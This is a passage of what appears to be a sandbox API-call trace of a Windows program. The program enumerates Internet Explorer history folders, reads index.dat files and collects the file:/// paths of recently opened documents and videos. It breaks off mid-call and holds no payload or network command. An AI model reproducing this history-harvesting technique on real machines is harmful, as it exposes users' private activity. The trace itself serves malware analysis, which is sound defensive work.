_Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv" [0085.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned 72 [0085.782] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.782] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/txCExlFtYlQ2O.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif" [0085.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned 69 [0085.782] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.782] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/Kdgk.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx" [0085.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned 55 [0085.782] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.782] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/cS-naYuN66m1kJ0QH.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv" [0085.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned 72 [0085.782] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.782] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/4q6aKWEGF.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv" [0085.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned 56 [0085.782] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.782] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/O%201buNaGZfIK.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv" [0085.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned 61 [0085.783] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.783] _strlwr (in: _Str="file:///C:/Users/BGC6U8~1/Desktop/sample_file.doc" | out: _Str="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned="file:///c:/users/bgc6u8~1/desktop/sample_file.doc" [0085.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned 50 [0085.783] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=62208, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf300 [0085.783] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=62336, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf380 [0085.783] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=62464, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf400 [0085.783] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=62592, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf480 [0085.783] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=62720, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf500 [0085.783] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=62848, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf580 [0085.783] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=62976, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf600 [0085.783] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.783] SetFilePointer (in: hFile=0x9c, lDistanceToMove=63104, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf680 [0085.784] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.784] SetFilePointer (in: hFile=0x9c, lDistanceToMove=63232, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf700 [0085.784] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.784] SetFilePointer (in: hFile=0x9c, lDistanceToMove=63360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf780 [0085.784] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.784] SetFilePointer (in: hFile=0x9c, lDistanceToMove=63488, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf800 [0085.784] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.784] SetFilePointer (in: hFile=0x9c, lDistanceToMove=63616, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf880 [0085.784] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.784] SetFilePointer (in: hFile=0x9c, lDistanceToMove=63744, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf900 [0085.784] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.784] SetFilePointer (in: hFile=0x9c, lDistanceToMove=63872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf980 [0085.784] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.784] SetFilePointer (in: hFile=0x9c, lDistanceToMove=64000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfa00 [0085.784] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.784] SetFilePointer (in: hFile=0x9c, lDistanceToMove=64128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfa80 [0085.784] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.784] SetFilePointer (in: hFile=0x9c, lDistanceToMove=64256, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfb00 [0085.784] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.784] SetFilePointer (in: hFile=0x9c, lDistanceToMove=64384, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfb80 [0085.784] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.784] SetFilePointer (in: hFile=0x9c, lDistanceToMove=64512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfc00 [0085.785] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.785] SetFilePointer (in: hFile=0x9c, lDistanceToMove=64640, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfc80 [0085.785] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.785] SetFilePointer (in: hFile=0x9c, lDistanceToMove=64768, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfd00 [0085.785] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.785] SetFilePointer (in: hFile=0x9c, lDistanceToMove=64896, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfd80 [0085.785] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.785] SetFilePointer (in: hFile=0x9c, lDistanceToMove=65024, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfe00 [0085.785] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.785] SetFilePointer (in: hFile=0x9c, lDistanceToMove=65152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfe80 [0085.785] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.785] SetFilePointer (in: hFile=0x9c, lDistanceToMove=65280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xff00 [0085.785] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.785] SetFilePointer (in: hFile=0x9c, lDistanceToMove=65408, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xff80 [0085.785] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.785] CloseHandle (hObject=0x9c) returned 1 [0085.785] FindNextFileW (in: hFindFile=0x58e8a8, lpFindFileData=0x2895a8 | out: lpFindFileData=0x2895a8) returned 1 [0085.785] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.785] wcslen (_String="MSHist012017101220171013") returned 0x18 [0085.785] wcscpy (in: _Dest=0x2897f8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5" [0085.785] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5") returned 0x4c [0085.785] wcscat (in: _Dest=0x2897f8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\" [0085.785] wcscat (in: _Dest=0x2897f8, _Source="MSHist012017101220171013" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013" [0085.785] wcscmp (_String1="MSHist012017101220171013", _String2="..") returned 1 [0085.785] wcscmp (_String1="MSHist012017101220171013", _String2=".") returned 1 [0085.786] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned 0x65 [0085.786] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned 0x65 [0085.786] wcslen (_String="*.*") returned 0x3 [0085.786] wcscpy (in: _Dest=0x288924, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013" [0085.786] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned 0x65 [0085.786] wcscat (in: _Dest=0x288924, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\" [0085.786] wcscat (in: _Dest=0x288924, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\*.*" [0085.786] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\*.*", lpFindFileData=0x288bac | out: lpFindFileData=0x288bac) returned 0x58e8e8 [0085.786] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned 0x65 [0085.786] wcslen (_String=".") returned 0x1 [0085.786] wcscpy (in: _Dest=0x288dfc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013" [0085.786] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned 0x65 [0085.786] wcscat (in: _Dest=0x288dfc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\" [0085.786] wcscat (in: _Dest=0x288dfc, _Source="." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\.") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\." [0085.786] wcscmp (_String1=".", _String2="..") returned -1 [0085.786] wcscmp (_String1=".", _String2=".") returned 0 [0085.786] _wcsicmp (_String1=".", _String2="index.dat") returned -59 [0085.786] FindNextFileW (in: hFindFile=0x58e8e8, lpFindFileData=0x288bac | out: lpFindFileData=0x288bac) returned 1 [0085.786] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned 0x65 [0085.786] wcslen (_String="..") returned 0x2 [0085.786] wcscpy (in: _Dest=0x288dfc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013" [0085.786] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned 0x65 [0085.786] wcscat (in: _Dest=0x288dfc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\" [0085.787] wcscat (in: _Dest=0x288dfc, _Source=".." | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\..") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\.." [0085.787] wcscmp (_String1="..", _String2="..") returned 0 [0085.787] _wcsicmp (_String1="..", _String2="index.dat") returned -59 [0085.787] FindNextFileW (in: hFindFile=0x58e8e8, lpFindFileData=0x288bac | out: lpFindFileData=0x288bac) returned 1 [0085.787] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned 0x65 [0085.787] wcslen (_String="index.dat") returned 0x9 [0085.787] wcscpy (in: _Dest=0x288dfc, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013" [0085.787] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013") returned 0x65 [0085.787] wcscat (in: _Dest=0x288dfc, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\" [0085.787] wcscat (in: _Dest=0x288dfc, _Source="index.dat" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\index.dat") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\index.dat" [0085.787] _wcsicmp (_String1="index.dat", _String2="index.dat") returned 0 [0085.787] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012017101220171013\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012017101220171013\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0085.787] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.787] ReadFile (in: hFile=0xa0, lpBuffer=0x28887c, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x282544, lpOverlapped=0x0 | out: lpBuffer=0x28887c*, lpNumberOfBytesRead=0x282544*=0x20, lpOverlapped=0x0) returned 1 [0085.788] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0085.788] SetFilePointer (in: hFile=0xa0, lDistanceToMove=20480, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5000 [0085.788] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.788] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.788] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.788] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/UhCSZZxqQxRciV3_G.odp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp" [0085.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 105 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned -1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned -1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned -1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned -1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned 1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned 1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned 1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned 1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned 1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned 1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned -1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned -1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned 1 [0085.788] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned 1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned -1 [0085.789] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned 1 [0085.789] wcscmp 